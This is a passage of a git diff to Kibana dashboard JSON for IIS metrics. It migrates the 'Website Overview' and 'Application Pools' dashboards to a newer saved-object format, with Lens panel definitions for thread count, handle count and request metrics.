"3320bd98-e6de-45f5-ba1c-73970b10e884" - ], - "columns": { - "3320bd98-e6de-45f5-ba1c-73970b10e884": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total GET Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_get_requests" - }, - "38b75d84-47c1-44ff-8636-2b921bdd8532": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "9c50c4db-f26b-4c42-a6a3-34e866e8a77e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_get_requests" + }, + "38b75d84-47c1-44ff-8636-2b921bdd8532": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9c50c4db-f26b-4c42-a6a3-34e866e8a77e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": 
{ + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "3320bd98-e6de-45f5-ba1c-73970b10e884" - ], - "layerId": "aa318ea4-9a32-4128-9637-ceee407f2b93", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", - "xAccessor": "38b75d84-47c1-44ff-8636-2b921bdd8532", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "3320bd98-e6de-45f5-ba1c-73970b10e884" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + 
"internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "3320bd98-e6de-45f5-ba1c-73970b10e884" + ], + "layerId": "aa318ea4-9a32-4128-9637-ceee407f2b93", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "f0a4e232-26f6-4b33-b728-62f73cd74f08", - "w": 12, - "x": 0, - "y": 36 - }, - "panelIndex": "f0a4e232-26f6-4b33-b728-62f73cd74f08", - "title": "Total GET Requests", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Website Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "d366a32e-1ed5-4089-82b4-e9e34b674c43:indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ba537347-2422-4e09-931e-c0ff3ad24ca3:indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8:indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7dbfdcf7-2742-4a48-8520-170afa068e2c:indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c01ce6f-2b93-439a-b5a0-d911da07af9b:indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", - 
"type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6bac7104-6ff4-480a-9987-ce2e92628053:indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4f05e422-f1be-4856-be21-9be206b34834:indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b:indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0:indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce:indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "49524a34-1a10-49bf-842f-20d2606380a4:indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4:indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e:indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f0a4e232-26f6-4b33-b728-62f73cd74f08:indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", - "type": "index-pattern" + "seriesType": "line", + "splitAccessor": "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", + "xAccessor": "38b75d84-47c1-44ff-8636-2b921bdd8532", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "3320bd98-e6de-45f5-ba1c-73970b10e884" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + 
"preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_1a1fa4d4-877e-44cb-ae33-ed1cdb800e99:optionsListDataView", - "type": "index-pattern" - } + "title": "Total GET Requests" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Website Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "d366a32e-1ed5-4089-82b4-e9e34b674c43:indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ba537347-2422-4e09-931e-c0ff3ad24ca3:indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8:indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7dbfdcf7-2742-4a48-8520-170afa068e2c:indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c01ce6f-2b93-439a-b5a0-d911da07af9b:indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6bac7104-6ff4-480a-9987-ce2e92628053:indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4f05e422-f1be-4856-be21-9be206b34834:indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", + "type": "index-pattern" + }, + { + 
"id": "metrics-*", + "name": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b:indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0:indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce:indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "49524a34-1a10-49bf-842f-20d2606380a4:indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4:indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e:indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f0a4e232-26f6-4b33-b728-62f73cd74f08:indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_1a1fa4d4-877e-44cb-ae33-ed1cdb800e99:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false }
\ No newline at end of file
diff --git a/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json
index 78334955177..64aed58d482 100644
--- a/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json
+++ b/packages/iis/kibana/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7.json
@@ -1,1301 +1,1318 @@
 { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"44559996-134f-4279-8705-0da162d57dc9\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.application_pool.name\",\"title\":\"Application Pools\",\"id\":\"44559996-134f-4279-8705-0da162d57dc9\",\"enhancements\":{}}}}" + "id": "iis-b4108810-861c-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNywxXQ==", + "attributes": { + "controlGroupInput": { + "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"44559996-134f-4279-8705-0da162d57dc9\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"iis.application_pool.name\",\"title\":\"Application Pools\",\"id\":\"44559996-134f-4279-8705-0da162d57dc9\",\"enhancements\":{}}}}" + }, + "description": "This dashboard shows application pools metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 11, + "i": "bbb20379-e68e-42c9-aa22-23eec29e026d", + "w": 9, + "x": 0, + "y": 0 }, - "description": "This dashboard shows 
application pools metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "panelIndex": "bbb20379-e68e-42c9-aa22-23eec29e026d", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [**Application Pools**](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Application Pool Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", + "w": 20, + "x": 9, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [Webserver processes](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [**Application Pools**](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", - "openLinksInNewTab": false + "panelIndex": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", + "type": 
"index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "180189b1-7216-4cf8-a803-95b53c2f6e40": { + "columnOrder": [ + "7a627f5b-b48b-44c4-876e-2139937182f6", + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + ], + "columns": { + "7a627f5b-b48b-44c4-876e-2139937182f6": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" }, - "type": "markdown", - "uiState": {} + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.application_pool.process.thread_count: *" + }, + "isBucketed": false, + "label": "Thread Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.thread_count" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 11, - "i": "bbb20379-e68e-42c9-aa22-23eec29e026d", - "w": 9, - "x": 0, - "y": 0 + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "bbb20379-e68e-42c9-aa22-23eec29e026d", - "title": "Navigation Application Pool Overview", - "type": "visualization", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-180189b1-7216-4cf8-a803-95b53c2f6e40", - "type": 
"index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "180189b1-7216-4cf8-a803-95b53c2f6e40": { - "columnOrder": [ - "7a627f5b-b48b-44c4-876e-2139937182f6", - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - ], - "columns": { - "7a627f5b-b48b-44c4-876e-2139937182f6": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - }, - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.application_pool.process.thread_count: *" - }, - "isBucketed": false, - "label": "Thread Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.thread_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - ], - "layerId": "180189b1-7216-4cf8-a803-95b53c2f6e40", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "7a627f5b-b48b-44c4-876e-2139937182f6", - "yConfig": [ - { - "axisMode": "left", - "color": "#16a5a5", - "forAccessor": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" - } - ] - } - ], - "legend": { - "isVisible": false, - 
"position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "layers": [ + { + "accessors": [ + "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + ], + "layerId": "180189b1-7216-4cf8-a803-95b53c2f6e40", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "7a627f5b-b48b-44c4-876e-2139937182f6", + "yConfig": [ + { + "axisMode": "left", + "color": "#16a5a5", + "forAccessor": "a1cb8cf5-064f-4ff6-a08b-1ea4f18d21d7" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false }, - "gridData": { - "h": 11, - "i": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", - "w": 20, - "x": 9, - "y": 0 + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "panelIndex": "5cb9f7e0-eb7c-4a40-8746-bf7a38f005f5", - "title": "Thread Count", - "type": "lens", - "version": "8.5.0" + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e": { - "columnOrder": [ - "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", - "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - ], - "columns": { - "3479a16c-aae2-470c-8b3d-a4f4253b86c8": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 
"iis.application_pool.process.handle_count: *" - }, - "isBucketed": false, - "label": "Handle Count", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.handle_count" - }, - "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.application_pool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "3479a16c-aae2-470c-8b3d-a4f4253b86c8", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.application_pool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Thread Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "25c69234-9c74-4179-87f7-3be8a18e4cd9", + "w": 19, + "x": 29, + "y": 0 + }, + "panelIndex": "25c69234-9c74-4179-87f7-3be8a18e4cd9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e": { + "columnOrder": [ + "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", + "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + ], + "columns": { + "3479a16c-aae2-470c-8b3d-a4f4253b86c8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.application_pool.process.handle_count: *" + 
}, + "isBucketed": false, + "label": "Handle Count", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - ], - "layerId": "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", - "yConfig": [ - { - "axisMode": "left", - "color": "#653294", - "forAccessor": "3479a16c-aae2-470c-8b3d-a4f4253b86c8" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.application_pool.process.handle_count" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.application_pool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "3479a16c-aae2-470c-8b3d-a4f4253b86c8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.application_pool.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + 
"visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 11, - "i": "25c69234-9c74-4179-87f7-3be8a18e4cd9", - "w": 19, - "x": 29, - "y": 0 + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "25c69234-9c74-4179-87f7-3be8a18e4cd9", - "title": "Handle Count", - "type": "lens", - "version": "8.5.0" + "layers": [ + { + "accessors": [ + "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + ], + "layerId": "0e8ef29c-b148-4b4b-9ee6-f37bd2965f7e", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "8c4c9a4f-f5b6-4c5e-99d4-79b28911ea7d", + "yConfig": [ + { + "axisMode": "left", + "color": "#653294", + "forAccessor": "3479a16c-aae2-470c-8b3d-a4f4253b86c8" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Handle Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", + "w": 24, + "x": 0, + "y": 11 + }, + "panelIndex": "a7ca9003-7450-4fa8-b26b-58cdaa3a8b5f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-9bed596b-4a6f-43ba-b9ea-6f229e076aef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": 
{ + "formBased": { + "layers": { + "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { + "columnOrder": [ + "7f6e3ead-3933-4202-8b47-73e7a4c46c60", + "80ebd176-a8e8-489f-b226-55952da7c11e", + "35c13f71-7863-401d-8da0-e13af7226004" + ], + "columns": { + "35c13f71-7863-401d-8da0-e13af7226004": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Write Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "9bed596b-4a6f-43ba-b9ea-6f229e076aef": { - "columnOrder": [ - "7f6e3ead-3933-4202-8b47-73e7a4c46c60", - "80ebd176-a8e8-489f-b226-55952da7c11e", - "35c13f71-7863-401d-8da0-e13af7226004" - ], - "columns": { - "35c13f71-7863-401d-8da0-e13af7226004": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Write Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.application_pool.process.io_write_operations_per_sec" - }, - 